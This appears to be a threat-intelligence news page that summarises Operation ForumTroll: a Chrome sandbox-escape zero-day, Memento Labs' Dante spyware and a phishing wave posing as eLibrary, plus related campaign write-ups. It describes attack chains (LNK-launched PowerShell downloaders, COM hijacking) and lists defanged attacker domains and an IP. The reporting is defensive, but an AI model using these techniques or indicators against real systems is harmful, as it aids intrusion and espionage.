CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Memento Labs linked to Chrome zero-day exploitation in Operation ForumTroll

First reported
Last updated
4 unique sources, 5 articles

Summary

Hide ▲

Operation ForumTroll, discovered in March 2025, targeted Russian organizations and individuals using a zero-day vulnerability in Google Chrome (CVE-2025-2783). The campaign, also tracked as TaxOff/Team 46 by Positive Technologies and Prosperous Werewolf by BI.ZONE, delivered malware linked to the Italian spyware vendor Memento Labs. The attacks used phishing emails with malicious links to infect victims, targeting media outlets, universities, research centers, government organizations, financial institutions, and other organizations in Russia and Belarus. The malware, identified as LeetAgent and Dante, was used to steal data and maintain persistence on compromised systems. Memento Labs, formed after InTheCyber Group acquired Hacking Team, presented its Dante spyware at a conference in 2023. The malware was used in attacks dating back to at least 2022. The attacks involved sophisticated techniques to ensure only targeted victims were compromised. The zero-day vulnerability (CVE-2025-2783) was discovered and reported to Google by researchers at Kaspersky Lab earlier in 2025. The exploit bypassed Chrome's sandbox protections by exploiting a logic vulnerability in Chrome caused by an obscure quirk in the Windows OS. The exploit used pseudo handles to disable sandbox functionality, allowing unauthorized access to privileged processes. The exploit represents a new class of vulnerabilities that could affect other applications and Windows services. The group known as Mem3nt0 mori, also referred to as ForumTroll APT, is linked to Operation ForumTroll. The attacks began in March 2025 with highly personalized phishing emails inviting victims to the Primakov Readings forum. The flaw in Chrome stemmed from a logical oversight in Windows' handling of pseudo handles, allowing attackers to execute code in Chrome's browser process. Google patched the issue in version 134.0.6998.177/.178. Firefox developers found a related issue in their browser, addressed as CVE-2025-2857. Kaspersky's researchers concluded that Mem3nt0 mori leveraged Dante-based components in the ForumTroll campaign, marking the first observed use of this commercial spyware in the wild. The discovery underscores ongoing risks from state-aligned and commercial surveillance vendors. Kaspersky urged security researchers to examine other software and Windows services for similar pseudo-handle vulnerabilities. In a new wave of attacks detected in October 2025, the threat actor targeted individuals in Russia, specifically scholars in political science, international relations, and global economics, working at major Russian universities and research institutions. The latest attack wave used emails claiming to be from eLibrary, a Russian scientific electronic library, with messages sent from the address 'support@e-library[.]wiki'. The domain was registered in March 2025, six months before the start of the campaign, indicating preparations for the attack had been underway for some time. The emails contained links to a malicious site to download a plagiarism report, which, when clicked, downloaded a ZIP archive named with the victim's last name, first name, and patronymic. The links were designed for one-time use, displaying a Russian language message stating 'Download failed, please try again later' if accessed more than once. The archive contained a Windows shortcut (LNK) that, when executed, ran a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload contacted a URL to fetch a final-stage DLL and persist it using COM hijacking, also downloading and displaying a decoy PDF to the victim. The final payload was a command-and-control (C2) and red teaming framework known as Tuoni, enabling remote access to the victim's Windows device. ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022.

Timeline

  1. 27.10.2025 18:37 5 articles · 1mo ago

    Memento Labs linked to Chrome zero-day exploitation in Operation ForumTroll

    The group known as Mem3nt0 mori, also referred to as ForumTroll APT, is linked to Operation ForumTroll. The attacks began in March 2025 with highly personalized phishing emails inviting victims to the Primakov Readings forum. The flaw in Chrome stemmed from a logical oversight in Windows' handling of pseudo handles, allowing attackers to execute code in Chrome's browser process. Google patched the issue in version 134.0.6998.177/.178. Firefox developers found a related issue in their browser, addressed as CVE-2025-2857. Kaspersky's researchers concluded that Mem3nt0 mori leveraged Dante-based components in the ForumTroll campaign, marking the first observed use of this commercial spyware in the wild. The discovery underscores ongoing risks from state-aligned and commercial surveillance vendors. Kaspersky urged security researchers to examine other software and Windows services for similar pseudo-handle vulnerabilities. In a new wave of attacks detected in October 2025, the threat actor targeted individuals in Russia, specifically scholars in political science, international relations, and global economics, working at major Russian universities and research institutions. The latest attack wave used emails claiming to be from eLibrary, a Russian scientific electronic library, with messages sent from the address 'support@e-library[.]wiki'. The domain was registered in March 2025, six months before the start of the campaign, indicating preparations for the attack had been underway for some time. The emails contained links to a malicious site to download a plagiarism report, which, when clicked, downloaded a ZIP archive named with the victim's last name, first name, and patronymic. The links were designed for one-time use, displaying a Russian language message stating 'Download failed, please try again later' if accessed more than once. The archive contained a Windows shortcut (LNK) that, when executed, ran a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload contacted a URL to fetch a final-stage DLL and persist it using COM hijacking, also downloading and displaying a decoy PDF to the victim. The final payload was a command-and-control (C2) and red teaming framework known as Tuoni, enabling remote access to the victim's Windows device. ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Eighth Chrome Zero-Day Vulnerability Patched in 2025

Google has released an emergency update to fix a high-severity zero-day vulnerability (466192044) in Chrome, marking the eighth such flaw exploited in attacks in 2025. The vulnerability, a buffer overflow in the ANGLE's Metal renderer, affects Chrome versions for Windows, macOS, and Linux. Google has not disclosed further details, including the CVE ID, as the issue remains under coordination. The flaw could lead to memory corruption, crashes, sensitive information leaks, and arbitrary code execution. Users are advised to update their browsers to versions 143.0.7499.109 for Windows and Linux, and 143.0.7499.110 for macOS. This update also addresses two additional medium-severity vulnerabilities (CVE-2025-14372 and CVE-2025-14373). Additionally, Google has released patches for three new Chrome zero-day vulnerabilities, including a high-severity one for which an exploit is accessible in the wild. The high-severity zero-day is referred to only by Google’s internal tracker ID, 466192044, with no CVE attributed at this stage. The status of the vulnerability is marked as 'Under coordination.' Access to the details of a vulnerability may be kept restricted until a majority of users are updated with a fix.

Open in new tab

Predator Spyware Exploits Zero-Click Infection Vector via Malicious Ads

Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information.

Open in new tab

SideWinder Adopts ClickOnce-Based Attack Chain Targeting South Asian Diplomats

SideWinder, a persistent threat actor, has targeted South Asian diplomats with a new campaign. The attacks, conducted from March through September 2025, used spear-phishing emails to deliver malware. The infection chain involved PDF and ClickOnce-based vectors, along with previously documented Microsoft Word exploits. The campaign targeted embassies and organizations in India, Sri Lanka, Pakistan, and Bangladesh. The malware families deployed include ModuleInstaller and StealerBot, which are used to gather sensitive information from compromised hosts. The attacks highlight SideWinder's evolving tactics and their focus on sophisticated evasion techniques and espionage objectives.

Open in new tab

PhantomCaptcha Campaign Targets Ukraine Aid Groups

A coordinated spear-phishing campaign, dubbed PhantomCaptcha, targeted organizations involved in Ukraine's war relief efforts. The campaign delivered a remote access trojan (RAT) using a WebSocket for command-and-control (C2). The attack took place on October 8, 2025, and impersonated the Ukrainian President's Office, using weaponized PDFs and fake Zoom meetings to trick victims into executing malicious PowerShell commands. The malware performed reconnaissance and enabled remote command execution and data exfiltration. The campaign targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF Ukraine, Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations. The malware was hosted on Russian-owned infrastructure and connected to a remote WebSocket server for C2 operations. The campaign took six months to prepare and involved a sophisticated multi-stage spear-phishing operation, with the weaponized PDF appearing as a legitimate governmental communique. The attack chain included a heavily obfuscated PowerShell downloader to bypass signature-based defenses and hinder analysis. The second-stage payload collected various user data, which was XOR-encrypted and sent to the C2 server. The final payload was a lightweight PowerShell backdoor that repeatedly reconnected to the remote WebSocket server. The campaign demonstrated extensive operational planning, compartmentalized infrastructure, and deliberate exposure control, with the infrastructure active only for a single day.

Open in new tab

MuddyWater Expands Campaign with MuddyViper Backdoor Targeting Israeli Entities

The MuddyWater threat actor, linked to Iran and also known as Static Kitten, Mercury, and Seedworm, has conducted a global phishing campaign targeting over 100 organizations, including government entities, embassies, diplomatic missions, foreign affairs ministries, consulates, international organizations, and telecommunications firms in the Middle East and North Africa (MENA) region. The campaign used compromised email accounts to send phishing emails with malicious Microsoft Word documents containing macros that dropped and launched the Phoenix backdoor, version 4. This backdoor provided remote control over infected systems. The campaign was active starting August 19, 2025, and used a command-and-control (C2) server registered under the domain screenai[.]online. The attackers employed three remote monitoring and management (RMM) tools and a custom browser credential stealer, Chromium_Stealer. The malware and tools were hosted on a temporary Python-based HTTP service linked to NameCheap's servers. The campaign highlights the ongoing use of trusted communication channels by state-backed threat actors to evade defenses and infiltrate high-value targets. The server and server-side command-and-control (C2) component were taken down on August 24, 2025, likely indicating a new stage of the attack. The MuddyWater threat actor has also targeted Israeli entities spanning academia, engineering, local government, manufacturing, technology, transportation, and utilities sectors. The hacking group has delivered a previously undocumented backdoor called MuddyViper. The attacks also singled out one technology company based in Egypt. The attack chains involve spear-phishing and the exploitation of known vulnerabilities in VPN infrastructure to infiltrate networks and deploy legitimate remote management tools. The campaign uses a loader named Fooder that decrypts and executes the C/C++-based MuddyViper backdoor. The MuddyViper backdoor enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. Additionally, the MuddyWater threat actor has deployed a new backdoor called UDPGangster that uses the User Datagram Protocol (UDP) for command-and-control (C2) purposes. The attack chain involves using spear-phishing tactics to distribute booby-trapped Microsoft Word documents that trigger the execution of a malicious payload once macros are enabled. The phishing messages impersonate the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs and purport to invite recipients to an online seminar titled "Presidential Elections and Results." The VBA script in the dropper file is equipped to conceal any sign of malicious activity by displaying a Hebrew-language decoy image from Israeli telecommunications provider Bezeq about supposed disconnection periods in the first week of November 2025 across various cities in the country. UDPGangster establishes persistence through Windows Registry modifications and boasts of various anti-analysis checks to resist efforts made by security researchers to take it apart. UDPGangster connects to an external server ("157.20.182[.]75") over UDP port 1269 to exfiltrate collected data, run commands using "cmd.exe," transmit files, update C2 server, and drop and execute additional payloads.

Open in new tab